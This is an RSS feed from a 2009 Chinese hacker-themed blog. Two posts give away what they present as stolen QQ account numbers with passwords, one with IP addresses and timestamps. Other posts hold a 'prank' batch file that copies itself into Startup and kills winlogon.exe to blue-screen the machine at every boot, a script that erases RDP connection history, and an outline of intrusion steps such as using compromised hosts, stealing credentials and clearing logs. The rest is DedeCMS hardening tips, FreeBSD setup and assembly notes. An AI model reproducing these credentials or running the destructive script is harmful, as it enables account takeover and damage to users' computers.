<?xml version="1.0" encoding="UTF-8" ?>



<rss version="2.0" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">

<channel>
<title><![CDATA[小皓黑网]]> </title>
<description>
<![CDATA[最新公告！本博客刚刚开始！每天定期发放QQ号帐号密码！希望大家常来哈！ ]]>
</description>
<link>http://xp0375.blog.bokee.net/</link>
<language>zh-cn</language>
<creator>xp0375</creator>
<pubDate>Sun, 05 Jul 2009 19:11:21 CST </pubDate>
<generatorAgent rdf:resource="http://www.bokee.net"/>
<ttl>5</ttl>

<item>
<title>大家好！本博客今天发放了第二期的QQ号码！大家快快抢哈！</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3561814.html</link>
<description>
<![CDATA[<p>大家好！本博客今天发放了第二期的QQ号码！大家快快抢哈！</p>
<p><br />693715543----A123456789HONGBO----IP:60.14.130.167----时间:2009-7-20 16:22:31<br />693715543----A123456789HONGBO----IP:60.14.130.167----时间:2009-7-20 16:22:34<br />693715543----A123456789HONGBO----IP:60.14.130.167----时间:2009-7-20 16:22:36<br />414498248----limengjiao----IP:119.62.40.131----时间:2009-7-21 14:38:43<br />414498248----limengjiao----IP:119.62.40.131----时间:2009-7-21 14:38:46<br />313620837----wei5201314----IP:222.242.36.91----时间:2009-7-21 14:41:27<br />313620837----wei5201314----IP:222.242.36.91----时间:2009-7-21 14:41:32<br />414498249----limengjiao----IP:119.62.40.131----时间:2009-7-21 15:02:02<br />414498249----limengjiao----IP:119.62.40.131----时间:2009-7-21 15:02:05<br />414498249----limengjiao----IP:119.62.40.131----时间:2009-7-21 15:02:10<br />854000188----tianhaoyuan369----IP:222.242.36.91----时间:2009-7-21 15:02:11<br />854000188----tianhaoyuan369----IP:222.242.36.91----时间:2009-7-21 15:02:22<br />710356474----q00000000----IP:59.50.168.237----时间:2009-7-21 16:29:19<br />710356474----q00000000----IP:59.50.168.237----时间:2009-7-21 16:29:20<br />360053302----YUXIANLIJING0219----IP:119.62.40.131----时间:2009-7-21 17:24:37<br />360053302----YUXIANLIJING0219----IP:119.62.40.131----时间:2009-7-21 17:24:38<br />414498249----limengjiao----IP:59.111.61.1----时间:2009-7-21 18:38:09<br />414498249----limengjiao----IP:59.111.61.1----时间:2009-7-21 18:38:10<br />498484036----yy20080322.com----IP:117.92.88.7----时间:2009-7-22 19:46:20<br />498484036----yy20080322.com----IP:117.92.88.7----时间:2009-7-22 19:46:21<br />439536101----sny1234567890-=----IP:117.92.88.7----时间:2009-7-22 19:48:01<br />439536101----sny1234567890-=----IP:117.92.88.7----时间:2009-7-22 19:48:02<br />376648161----changhao----IP:123.190.193.218----时间:2009-7-22 21:37:41<br />376648161----changhao----IP:123.190.193.218----时间:2009-7-22 21:37:45<br />122575487----7771993321----IP:116.17.70.71----时间:2009-7-23 0:00:25<br />409301380----TXnimadetou0.0----IP:112.113.17.28----时间:2009-7-23 8:42:30<br />409301380----TXnimadetou0.0----IP:112.113.17.28----时间:2009-7-23 8:42:30<br />294564260----3.1415962537----IP:218.102.126.169----时间:2009-7-23 10:43:09<br />409301380----TXnimadetou0.0----IP:112.113.17.71----时间:2009-7-23 20:22:47<br />417982827----chenmodeHL..----IP:112.113.17.71----时间:2009-7-23 20:48:40<br />417982827----chenmodeHL..----IP:112.113.17.71----时间:2009-7-23 20:48:41<br />444681143----zjjytxx3182081----IP:116.17.68.135----时间:2009-7-23 21:35:02<br />444681143----zjjytxx3182081----IP:116.17.68.135----时间:2009-7-23 21:35:05<br />122575487----7771993321----IP:116.17.68.135----时间:2009-7-23 21:41:58<br />122575487----7771993321----IP:116.17.68.135----时间:2009-7-23 21:42:04<br />caonima----daohaogou----IP:121.11.193.213----时间:2009-7-23 23:04:29<br />caonima----daohaogou----IP:121.11.193.213----时间:2009-7-23 23:04:30<br />caonima----daohaogou----IP:121.11.193.213----时间:2009-7-23 23:04:31<br />122575487----7771993321----IP:121.11.193.213----时间:2009-7-23 23:05:01<br />122575487----7771993321----IP:121.11.193.213----时间:2009-7-23 23:05:02<br />458738452----13502299523----IP:121.11.193.213----时间:2009-7-24 0:07:35<br />458738452----13502299523----IP:121.11.193.213----时间:2009-7-24 0:07:36<br />122575487----7771993321----IP:119.124.0.196----时间:2009-7-24 21:17:16<br />122575487----7771993321----IP:119.124.0.196----时间:2009-7-24 21:52:13<br />458738452----13502299523----IP:119.124.0.196----时间:2009-7-24 22:35:06<br />458738452----13502299523----IP:119.124.0.196----时间:2009-7-24 22:35:11<br />458738452----13502299523----IP:119.124.0.196----时间:2009-7-24 22:35:12<br />609336789----968431187q----IP:221.15.116.233----时间:2009-7-25 13:37:30<br />609336789----968431187q----IP:221.15.116.233----时间:2009-7-25 13:37:32<br />409301380----TXnimadetou0.0----IP:112.113.27.206----时间:2009-7-25 13:46:33<br />409301380----TXnimadetou0.0----IP:112.113.27.206----时间:2009-7-25 13:46:34<br />609336789----968431187q----IP:221.15.116.233----时间:2009-7-25 15:09:25<br />609336789----968431187q----IP:221.15.116.233----时间:2009-7-25 15:09:26<br />409301380----TXnimadetou0.0----IP:112.113.21.176----时间:2009-7-25 15:37:38<br />350321734----zhu350321----IP:124.94.131.87----时间:2009-7-25 17:45:44<br />458738452----13502299523----IP:116.17.4.144----时间:2009-7-25 21:43:37<br />458738452----13502299523----IP:116.17.4.144----时间:2009-7-25 21:43:39<br /><a href="mailto:734959937----@1964miaoyu----IP:115.58.207.203">734959937----@1964miaoyu----IP:115.58.207.203</a>----时间:2009-7-27 13:28:50<br /><a href="mailto:734959937----@1964miaoyu----IP:115.58.207.203">734959937----@1964miaoyu----IP:115.58.207.203</a>----时间:2009-7-27 17:48:48<br />541295387----mfflmq050708----IP:60.171.220.125----时间:2009-7-27 19:36:57<br />541295387----mfflmq050708----IP:60.171.220.125----时间:2009-7-27 19:36:58<br />634701571----wuyan3325521..- ----IP:218.62.84.194----时间:2009-7-27 22:41:00<br />634701571----wuyan3325521..- ----IP:218.62.84.194----时间:2009-7-27 22:41:01<br />969162771----FANG666666----IP:60.176.117.116----时间:2009-7-28 12:43:01<br />969162771----FANG666666----IP:60.176.117.116----时间:2009-7-28 12:43:02<br />499903639----666666----IP:60.176.117.116----时间:2009-7-28 15:02:05<br />181729296----3982351ma----IP:60.177.218.39----时间:2009-7-29 12:23:34<br />181729296----3982351ma----IP:60.177.218.39----时间:2009-7-29 12:23:34<br />181729296----3982351ma----IP:60.177.218.39----时间:2009-7-29 15:03:19</p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3561814.html</guid>
<subject></subject>
<author>xp0375</author>
<category></category>
<pubDate>Sun, 02 Aug 2009 15:32:37 CST </pubDate>
</item>

<item>
<title>大家好！本博客今天发放了第二期的QQ号码！大家快快抢哈！</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3477061.html</link>
<description>
<![CDATA[<p><font color="#ff0000" size="5">大家好！本博客今天发放了第一期的QQ号码！大家快快抢哈！</font></p>
<p><font color="#ff0000" size="5">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; QQ号中有的可以能有错误，但只是个别！</font></p>
<p><font style="BACKGROUND-COLOR: #ff0000" size="4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 账号&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 密码</font></p>
<p><font style="BACKGROUND-COLOR: #ff0000" size="4">157531434----ojzw84128542<br />214635163----3521709loveyou<br />258907469----sfxf123456<br />277575513----13560641535<br />308865019----13017697351<br />335846160----3203231986<br />377271119----JUANTINGPENG<br />416582558----jialiang1989<br />437730696----15883468666<br />715633532----1029423473<br />726618129----13661084810<br />860032568----HONEY104<br />619845039----ANLIWANGAIAI<br />12991466----198661486313520<br />87239219----19770511_zdb<br />18547473----zhuguowei120<br />20230446----huangguano1.com<br />40744366----fuwenyuanxiang0<br />58151057----wangfanw7882666<br />406053136----mojian8401592<br />407707215----13581854560+-a<br />408123834----111000<br />410219963----zcw1990213<br />410342937----cuiyunlei3754865<br />410383680----zhangyan1988720<br />410469216----woaini90196w1<br />410497087----wu19821012zh<br />410630924----w410630924<br />411059425----`jiafa110.<br />411350816----qingku168<br />412293310----1019623545renjie<br />412317929----chenxi978978<br />413295828----fangfang870816<br />413599805----13623400401<br />413940516----zhoulumeng0315<br />414555520----ljm116520138<br />415405996----hqq8539938<br />415462608----xiangdao19850312<br />416352538----qq19890805<br />417672894----lhjyg88lhjyg!*<br />417751259----wanxiaoyu123<br />418949192----laopowoaini<br />422608115----Rustam5201314<br />437414405----luoyi1988911<br />438991754----szm0564335<br />439574788----mmaicc19880822<br />441029741----13191200626<br />442356851----A13470441048<br />445156312----wogannima423910<br />445465642----YUAN520yao520<br />446333114----h8304767<br />446714608----yangqing<br />448310400----da1314520<br />448513458----32604078mm<br />448681303----mayuan198422<br />450227726----584513142020<br />450602756----019191<br />450725830----abs001002<br />450770040----wenjie123456<br />450881089----chen07948458328<br />451162052----667120<br />452756468----aw1777<br />452833910----7708805201314<br />452859715----woshigehaer1314<br />453210750----wangwen2008<br />454536849----183157918<br />455071121----qiang13868447265<br />455296388----19891209<br />455298589----ZOUYE19901025<br />458565029----520530654<br />461998315----haiyangniubi1<br />463958931----19920325kang<br />464332666----aihuan1314<br />464981682----19881014feng<br />466157398----3281989928<br />466353382----631866790<br />466781292----qweasd123<br />468072920----lifelong1984ren<br />469133451----469133451.<br />470020413----zhanghui<br />470281897----jbh4082668<br />470455952----gy15927753688<br />470846673----19768241980625<br />472262674----13843736368<br />472383537----13598955570<br />472715154----j251133700jjyu<br />472745321----woyahui<br />472944418----057612030924<br />475325004----xlhtxjpp<br />475967589----yelihuiailing123<br />477750945----477750945520<br />489654694----wdb2008+1987<br />489932421----xieshixian0112<br />493819190----rzx274259256<br />493904349----haiaini19921007<br />493965945----QING0920<br />494350023----bnm78791120<br />495101855----wangzhen4365855<br />497504979----xgfswdj198410<br />501246607----5521601wa<br />503229945----wangcaiyuxiuhua<br />504031786----zhoujingxun<br />504687023----a13857855950<br />505866954----55422625551745<br />506472908----zh9341<br />510710404----05184329122<br />511916969----sbl.520.yjy.<br />514537554----mengdizuiailiang<br />515380383----13972277081<br />515466868----13767329743<br />516461789----ycaihlj1314520<br />516801380----h2362431<br />516970168----HW)$)$wxp1124<br />517208391----PENGBANGJIN1109<br />519462585----750517zyh<br />519762636----laopoxuexue5211<br />522028201----1990111116<br />522314048----13958899506<br />523322747----jxfghj8312770<br />525482669----1984106<br />526777437----crj15052200603c<br />530089712----1972820<br />531401833----qqq3225642108<br />532693473----wHn1314521<br />532777257----q369050599<br />535384262----wu13336633219<br />536475174----jws813757956722<br />540275150----1300305570<br />540369168----13906150261<br />540526624----wo123123123<br />540769492----wangshengchao<br />540871496----13101960805<br />541440269----wcj19739280<br />542001828----5459775123<br />543128404----CDE998306VFR1104<br />544655177----xiaoyujingshen<br />545337908----a8686921<br />546932943----6748203000<br /></font><a href="mailto:547227321----@@@@@!!!!!530823"><font style="BACKGROUND-COLOR: #ff0000" size="4">547227321----@@@@@!!!!!530823</font></a><br /><font style="BACKGROUND-COLOR: #ff0000" size="4">549484861----aaaaasssssddddd<br />549524927----wlx.a549524927<br />549877796----KITTY1010<br />550190681----13400005443<br />552171423----4095553033<br />552525680----cai88132837<br />553027139----1275945987<br />562798588----licheng9900628<br />563608277----hongliang123<br />564270281----123456zxcvbnm<br />565065819----19910928767<br />565373654----love1314<br />568334456----jiangli0421<br />568776439----sanlin520<br />569155406----03773755871<br />570489067----1378817084<br />570624795----peng19921024<br />571189365----liulijun0810#@!<br />573569979----8009666<br />573641473----qwe123456789<br />573799833----13399645717FQS<br />575991055----su110110<br />576418373----ww542333<br />576492593----13913148726123<br />576706559----1984810<br />578060795----cassiopiea228116<br />578200156----a1b2c3d4<br /></font><a href="mailto:583658186----!!520@@qq"><font style="BACKGROUND-COLOR: #ff0000" size="4">583658186----!!520@@qq</font></a><br /><font style="BACKGROUND-COLOR: #ff0000" size="4">584104050----15867289686<br />584194579----liuzhudong123456<br />591099645----8743090801<br />591155098----925016111<br />592705809----13784740439<br />593957655----qwsa19701125<br />594994584----W,Y,H!<br />597650639----5002300<br />597846144----05345950495<br />598308110----qu58452413<br />601192676----csy19870514005x<br />601511784----355620620<br />601771236----xujun!!nishizhu<br />602008303----zhangruilinlin00<br />602216495----121212<br />602284744----a13039525736<br />604172680----iloveyou3<br />605307773----13558587878</font></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3477061.html</guid>
<subject>最新动态</subject>
<author>xp0375</author>
<category>最新动态</category>
<pubDate>Fri, 10 Jul 2009 10:29:28 CST </pubDate>
</item>

<item>
<title>dedecms:经常被挂马的朋友必看之安全思维</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470508.html</link>
<description>
<![CDATA[<p>一、挂马前的安全措失</p>
<p>　　A、改更默认管理目录dede。</p>
<p>　　B、检查install目录里是否存在install.lock文件。有用户没给install目录写权限导致安装的时候没有生成lock文件。安装完成后可整个删除intstall目录。</p>
<p>　　C、关注后台更新通知，检查是否打上最新dedeCMS补丁D、服务器web目录权限设置有条件的用户把DedeCms中 data、templets、uploads、html、special、images、install目录设置为不允许执行脚本，其它目录禁止写入，系统将更安全。</p>
<p>　　E、建议到官方下载程序F、服务器安全措施(以windows2003系统为例)</p>
<p>　　1、更新系统补丁到最新的，并打开自动更新</p>
<p>　　2、安装杀毒软件，更新病毒库到最新，并打开自动更新</p>
<p>　　3、打开系统自带的防火墙，开放应用中的端口，以过滤不必要的端口访问</p>
<p>　　4、打开tcp/ip安全策略，开放应用中的端口，以过滤不必要的端口访问</p>
<p>　　5、打开用户与用户组管理，添加IUSR用户对应不同WEB站点，以便分权限管理减少因一站点被黑带来的权限危机</p>
<p>　　6、针对不同的WEB目录设置不同的权限例：WebSiteA目录对应权限一般为system/administrators完全权限　IUSR_websiteA只读权限WebsiteA下面的子目录根据DedeCMS程序的需求分配IUSR_websiteA的写入运行权限，详见上面b点目录权限说明</p>
<p>　　7、不要在服务器上安装不明来路的软件</p>
<p>　　8、不要在服务器上安装什么破解版汉化版软件，如果实在需要建议用原版</p>
<p>　　9、建议不要安装ServU FTP软件，换用其它的FTP软件，更改FTP端口，用户密码不要太简单</p>
<p>　　10、如果不需要请尽量关闭服务应用的远程访问功能，如mysql user的远程访问</p>
<p>　　11、针对上面一点，可以运用本地安全策略功能，设置允许访问IP。</p>
<p>　　12、运用本地安全策略，还可以有效拒绝CC攻击，过滤来源IP的访问。</p>
<p>　　13、服务器上各项服务应用注意及时更新补丁，如mssql切记打补丁，而且要使用正版的，没条件的也要使用正规的复制版本14、服务器上的各项应用如IIS配置mysql配置，请搜索百度谷歌这方面的安全应用的专题，加强内功是很重要的。</p>
<p>　　15、开启IIS的访问日志记录</p>
<p>　　二、挂马后的安全检查必要时关闭网站进入一步步排查。</p>
<p>　　A、进DedeCMS管理后台检查是否有新补丁或安全提醒没有及时更新。</p>
<p>　　B、检查源文件中是否有相应木马病毒代码，以确认是否为ARP攻击ARP攻击表现：程序文件毫无异动，攻击是采用欺骗目标网关以达到欺骗用户端的效果，实现用户端访问网站加载木马的目的。</p>
<p>　　ARP攻击防范：对服务器加装防ARP攻击类的软件及其它应对措施，或联系您的IDC服务商。</p>
<p>　　C、检查目录权限，详见第一大点里的安全措施。</p>
<p>　　D、检查FTP里的每一个目录，查找最近被修改过的可疑文件。</p>
<p>　　1、用记事本等类工具打开查找，如果是真被挂马，这里分析下都能找到。</p>
<p>　　2、如果是整站被挂，请着重先检查下整站调用的js文件。</p>
<p>　　3、从文件中找出被挂的代码，复制代码的关键语句部分，打开替换类软件批量替或批量找吧。</p>
<p>　　4、上面一步需要有服务器控制权限，没有的话只能下载回来批了。(这是谨慎的办法，如果你有把握那可以只检查部分文件或目录)E、上面还是解决不了，那得分析IISLOG日志，追根朔源查找入侵点。</p>
<p>　　你可以下载IISlog分析类软件研究。</p>
<p>　　三、如何向官方求助或报告安全问题？</p>
<p>　　1、查看木马、可疑文件的修改时间2、查看站点系统日志，对照第1点所获得的时间，找出挂马的方式。</p>
<p>　　3、请先认真阅读理解一二大点，确认仍无法解决的，请论坛PM官方技术支持。</p>
<p>本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：<a href="http://www.hackbase.com/tech/2009-07-06/53618.html">http://www.hackbase.com/tech/2009-07-06/53618.html</a></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470508.html</guid>
<subject>菜鸟天堂</subject>
<author>xp0375</author>
<category>菜鸟天堂</category>
<pubDate>Tue, 07 Jul 2009 17:44:28 CST </pubDate>
</item>

<item>
<title>FreeBSD 设置网卡IP,网关和DNS</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470468.html</link>
<description>
<![CDATA[<p>基本配置网卡IP与网关的配置文件是目录/etc下面的rc.conf文件.在配置之前请使用ifconfig -a来查看正确的网卡名,本人的是lnc0,</p>
<p>　　网络地址是:192.168.1.0/24的网络,IP地址为192.168.1.5,因此在rc.conf文件中添加:</p>
<p>　　ifconfig_lnc0=&quot;inet 192.168.1.5 netmask 255.255.255.0&quot;然后配置网关.在BSD中网关称为默认路由因此只要在rc.conf中添加一句:</p>
<p>　　defaultrouter=&quot;192.168.1.1&quot;这就是我的网关了.</p>
<p>　　最后添加NDS,NDS的配置也是同样在/etc目录下面的一个配置文件,叫&rdquo;resolv.conf&rdquo;的文件,</p>
<p>　　如果在该目录下面没有该文件可以使用touch resolv.conf创建一个新的,然后进入配置该文件.resolv.conf 的记录是：</p>
<p>　　nameserver 要查询的域名服务器的IP 地址。服务器按照顺序查询。 搜索域名的列表。这通常是由本地的域名决定的。search</p>
<p>　　本地域名。domain ,本人的resolv.conf配置为:</p>
<p>　　nameserver 202.96.128.86</p>
<p>　　nameserver 61.144.56.188我只配置了DNS服务器的IP地址就够了重启动后配置将会马上生效,如有不懂请查阅FreeBSD文档</p>
<p><br />本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：<a href="http://www.hackbase.com/tech/2009-07-06/53619.html">http://www.hackbase.com/tech/2009-07-06/53619.html</a></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470468.html</guid>
<subject>菜鸟天堂</subject>
<author>xp0375</author>
<category>菜鸟天堂</category>
<pubDate>Tue, 07 Jul 2009 17:31:12 CST </pubDate>
</item>

<item>
<title>恶搞批处理小程序 切勿拿自己电脑做试验</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470447.html</link>
<description>
<![CDATA[这是个开机蓝屏得小程序<br />　　@echo off<br />　　set var=%userprofile%\「开始」菜单\程序\启动<br />　　xcopy/y %0 &quot;%var%&quot;\<br />　　cmd /c start /min ntsd -c q -pn winlogon.exe 1&gt;nul 2&gt;nul<br />　　然后保存为.bat格式即可 注意：请勿拿自己得电脑做实验 后果自负哦<br />]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470447.html</guid>
<subject>菜鸟天堂</subject>
<author>xp0375</author>
<category>菜鸟天堂</category>
<pubDate>Tue, 07 Jul 2009 17:25:57 CST </pubDate>
</item>

<item>
<title>批处理清除3389远程桌面连接记录</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470429.html</link>
<description>
<![CDATA[<p>　　@echo off</p>
<p>　　@reg delete &ldquo;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&rdquo; /va /f</p>
<p>　　@del &ldquo;%USERPROFILE%\My Documents\Default.rdp&rdquo; /a</p>
<p>　　@exit</p>
<p>　　/va 删除项下面所有键值</p>
<p>　　/f不提示</p>
<p>　　/a 删除隐藏文件</p>
<p>　　保存为批处理。运行即可。</p>
<p><a href="http://www.hackbase.com/tech/2009-07-07/53645.html"></a></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3470429.html</guid>
<subject>菜鸟天堂</subject>
<author>xp0375</author>
<category>菜鸟天堂</category>
<pubDate>Tue, 07 Jul 2009 17:19:41 CST </pubDate>
</item>

<item>
<title>最新公告！本博客刚刚开始！每天定期发放QQ号帐号密码！希望大家常来哈！</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3469967.html</link>
<description>
<![CDATA[<span class="Title">&nbsp;
<p><font color="#ff0000" size="6">最新公告！本博客刚刚开始！每天定期发放QQ号帐号密码！希望大家常来哈！</font></p>
<p><font color="#ff0000" size="6">&nbsp; 为了回溃来访问过的用户，本小博客每天更新发放QQ号&nbsp; 希望大家可以及时来疯狂抢购哈！ </font></p>
<p><font color="#ff0000" size="6"></font></p>
<p><font color="#ff0000" size="6">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;活动开始时间：2009.7.8晚上8：00</font></p>
</span>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3469967.html</guid>
<subject>最新动态</subject>
<author>xp0375</author>
<category>最新动态</category>
<pubDate>Tue, 07 Jul 2009 15:03:39 CST </pubDate>
</item>

<item>
<title>个人主机入侵网络攻击的步骤</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464856.html</link>
<description>
<![CDATA[<p>个人主机入侵网络攻击的步骤</p>
<p>　　第一步：隐藏自已的位置</p>
<p>　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽 量通过&ldquo;跳板&rdquo;或&ldquo;肉鸡&rdquo;展开攻击。所谓&ldquo;肉鸡&rdquo;通常是指，HACK实现通过后门程序控制 的傀儡主机，通过&ldquo;肉鸡&rdquo;开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是 &ldquo;肉鸡&rdquo;的地址而很难追查。</p>
<p>　　第二步：寻找目标主机并分析目标主机</p>
<p>　　攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地 址，域名是为了便于记忆主机的IP地址而另起的名字，只要利用域名和IP地址就可以顺利地 找到目标主机。当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统 类型及其所提供服务等资料作个全面的了解。此时，攻击者们会使用一些扫描器工具，以试 图获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，开启了哪些服务，以 及服务程序的版本等资料，为入侵作好充分的准备。</p>
<p>　　第三步：获取帐号和密码，登录主机</p>
<p>　　攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻 觅合适时机以此身份进入主机。当然，利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。</p>
<p>　　第四步：获得控制权</p>
<p>　　攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后，就会做两件事 ：清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程 操纵程序，以便日后可以不被觉察地再次进入系统。此外，为了避免目标主机发现，清除日 志、删除拷贝的文件等手段来隐藏自己的踪迹之后，攻击者就开始下一步的行动。</p>
<p>　　第五步：窃取网络资源和特权</p>
<p>　　攻击者找到攻击目标后，会继续下一步的攻击。如：下载敏感信息；窃取帐号密码、 个人资料等。</p>
<p>　　三、网络攻击的原理和手法</p>
<p>　　1、从扫描开始</p>
<p>　　扫描往往是攻击的前奏，通过扫描，搜集目标主机的相关信息，以期寻找目标主机的漏洞。 常见的扫描工具有X-scan、superscan、流光、X-port等。</p>
<p>　　在这些工具中，国产的X-scan与流光可算的上是两个&ldquo;利器&rdquo;，这两个工具不但具有相当快 的扫描速度和精确度（个人感觉X-scan在扫描速度上可能更快一点），同时还是发起攻击的 第一手选择，当然在攻击方面，流光更为强悍些。</p>
<p>　　除了常见个WWW（80）、FTP（21）、TELNET（23）等，查查十大高风险事件，我们就知道， 攻击者通常还对下列端口很感兴趣：</p>
<p>　　135：MS RPC，可以产生针对Windows 2000/XP RPC服务远程拒绝服务攻击，以及RPC溢出漏 洞，著名的&ldquo;冲击波&rdquo;&ldquo;震荡波&rdquo;就是利用DCOM RPC感染设备；</p>
<p>　　137~139：NetBIOS，WINDOWS系统通过这个端口提供文件和打印共享；</p>
<p>　　445：Microsoft-ds，非常重要的端口，LSASS漏洞、RPC定位漏洞都在这里出现；</p>
<p>　　1433：Microsoft SQL，后面会提到，SQL SERVER默认安装时留下的空口令SA用户可以让攻 击者为所欲为；</p>
<p>　　5632：PCANYWERE，一种远程终端控制软件；</p>
<p>　　3389：WINDOWS远程终端服务</p>
<p>　　4899：RADMIN，一种远程终端控制软件</p>
<p>　　由此可见，没有扫描，自然也就没有攻击，从安全的角度的来说，个人主机最安全的系统应 该算是WINDOWS98，由于WINDOWS98几乎不开启任何服务，自然也没有任何开放端口，没有端 口，对于这类系统攻击的可能性就大大降低。当然，XP在打了SP2的补丁后，等于有了</p>
<p>本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：<a href="http://www.hackbase.com/tech/2009-06-12/53207.html">http://www.hackbase.com/tech/2009-06-12/53207.html</a></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464856.html</guid>
<subject>最新动态</subject>
<author>xp0375</author>
<category>最新动态</category>
<pubDate>Sun, 05 Jul 2009 21:40:46 CST </pubDate>
</item>

<item>
<title>凯文·米特尼克：我是如何入侵摩托罗拉的</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464845.html</link>
<description>
<![CDATA[<p>Kevin Mitnick（凯文?米特尼克），世界公认的头号黑客，第一个被FBI通缉的电脑黑客，他的传奇故事不仅在于如何入侵FBI和Sun、Novel和摩托罗拉的网站，更出名是他和FBI的探员们玩的猫鼠游戏，Mitnick总能领先一步，在探员们搜查他的家之前成功出逃，并且留下恶作剧般的线索。<br />在与FBI周旋了三年之后，Mitnick于1995年最终被捕，他的电脑入侵和诈骗罪名被判成立，2002年从监狱中释放。然而，他的黑客名声使他获得了利润丰厚的演讲工作，并且开办了一个安全顾问事务所。现在他的工作获得了可观的合法收入，但似乎和以前让他入狱的那些工作非常相同<br />　现年45岁的Mitnick接受了我们的采访，谈到是什么让他对黑客产生了兴趣，如今的黑客和30年前有什么不同，还有雇用前黑帽黑客做安全工作是否是明智的选择。</p>
<p>　　问：你是什么时候开始当黑客的？</p>
<p>　　Mitnick：16岁或是17岁吧，那时我在高中，大概是1979年，那时候我还没有走到违法这一步。</p>
<p>　　编者注：从整体发展情况看，黑客的年龄的确以年轻人居多，特别是处于十几岁到二十几岁的中学生和大学生。调查显示，80后已经成为中国黑</p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464845.html</guid>
<subject>最新动态</subject>
<author>xp0375</author>
<category>最新动态</category>
<pubDate>Sun, 05 Jul 2009 21:29:09 CST </pubDate>
</item>

<item>
<title>汇编语言8088</title>
<link>http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464830.html</link>
<description>
<![CDATA[<p>一、数据传输指令<br />它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据.<br />1. 通用数据传送指令.<br />MOV 传送字或字节.<br />MOVSX 先符号扩展,再传送.<br />MOVZX 先零扩展,再传送.<br />PUSH 把字压入堆栈.<br />POP 把字弹出堆栈.<br />PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.<br />POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.<br />PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.<br />POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.<br />BSWAP 交换32位寄存器里字节的顺序<br />XCHG 交换字或字节.( 至少有一个**作数为寄存器,段寄存器不可作为**作数)<br />CMPXCHG 比较并交换**作数.( 第二个**作数必须为累加器AL/AX/EAX )<br />XADD 先交换再累加.( 结果在第一个**作数里 )<br />XLAT 字节查表转换.<br />── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即<br />0-FFH); 返回 AL 为查表结果. ( [BX+AL]-&gt;AL )<br />2. 输入输出端口传送指令.<br />IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX} )<br />OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 )<br />输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,<br />其范围是 0-65535.<br />3. 目的地址传送指令.<br />LEA 装入有效地址.<br />例: LEA DX,string ;把偏移地址存到DX.<br />LDS 传送目标指针,把指针内容装入DS.<br />例: LDS SI,string ;把段地址:偏移地址存到DS:SI.<br />LES 传送目标指针,把指针内容装入ES.<br />例: LES DI,string ;把段地址:偏移地址存到ES:DI.<br />LFS 传送目标指针,把指针内容装入FS.<br />例: LFS DI,string ;把段地址:偏移地址存到FS:DI.<br />LGS 传送目标指针,把指针内容装入GS.<br />例: LGS DI,string ;把段地址:偏移地址存到GS:DI.<br />LSS 传送目标指针,把指针内容装入SS.<br />例: LSS DI,string ;把段地址:偏移地址存到SS:DI.<br />4. 标志传送指令.<br />LAHF 标志寄存器传送,把标志装入AH.<br />SAHF 标志寄存器传送,把AH内容装入标志寄存器.<br 